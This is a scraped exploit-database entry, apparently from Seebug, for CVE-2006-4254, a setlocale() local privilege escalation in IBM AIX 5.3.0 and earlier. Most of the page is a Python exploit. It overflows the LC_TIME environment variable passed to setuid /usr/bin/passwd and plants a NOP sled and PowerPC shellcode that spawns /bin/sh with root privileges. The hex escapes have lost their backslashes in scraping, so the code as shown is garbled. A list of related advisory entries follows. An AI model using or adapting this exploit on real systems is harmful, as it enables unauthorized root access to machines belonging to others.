Lucene search
RootSSV:7461HistoryNov 08, 2007 - 12:00 a.m.
IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit
2007-11-0800:00:00
Root
www.seebug.org
31
EPSS
0.011
Percentile
84.7%
No description provided by source.
#
#setlocale() exploit for aix 5.2 ( CVE-2006-4254 )
#[email protected]
#
from os import execve
bof=&quot;a&quot;*580+&quot;bbbbccccddddx2fxf2x28x2f&quot;
egg=&quot;x60&quot;*2350
shellcode=( # by intropy &lt;at&gt; caughq.org
&quot;x7cxa5x2ax79&quot; # xor. r5,r5,r5
&quot;x40x82xffxfd&quot; # bnel &lt;shellcode&gt;
&quot;x7fxe8x02xa6&quot; # mflr r31
&quot;x3bxffx01x20&quot; # cal r31,0x120(r31)
&quot;x38x7fxffx08&quot; # cal r3,-248(r31)
&quot;x38x9fxffx10&quot; # cal r4,-240(r31)
&quot;x90x7fxffx10&quot; # st r3,-240(r31)
&quot;x90xbfxffx14&quot; # st r5,-236(r31)
&quot;x88x5fxffx0f&quot; # lbz r2,-241(r31)
&quot;x98xbfxffx0f&quot; # stb r5,-241(r31)
&quot;x4cxc6x33x42&quot; # crorc cr6,cr6,cr6
&quot;x44xffxffx02&quot; # svca
&quot;/bin/sh&quot;
&quot;x05&quot;)
execve(&quot;/usr/bin/passwd&quot;,[&quot;&quot;],{&quot;EGG&quot;:egg+shellcode,&quot;LC_TIME&quot;:bof})
# sebug.net
Related
seebug
seebug
IBM AIX <= 5.3.0 - setlocale() Local Privilege Escalation Exploit
2014-07-01 00:00:00
zdt
zdt
IBM AIX <= 5.3.0 setlocale() Local Privilege Escalation Exploit
2007-11-07 00:00:00
exploitpack
exploitpack
IBM AIX 5.3.0 - setlocale() Local Privilege Escalation
2007-11-07 00:00:00
exploitdb
exploitdb
IBM AIX 5.3.0 - 'setlocale()' Local Privilege Escalation
2007-11-07 00:00:00
nvd
nvd
CVE-2006-4254
2006-08-21 20:04:00
cvelist
cvelist
CVE-2006-4254
2006-08-21 20:00:00
packetstorm
packetstorm
setlocate-local.txt
2007-11-07 00:00:00
cve
cve
CVE-2006-4254
2006-08-21 20:04:00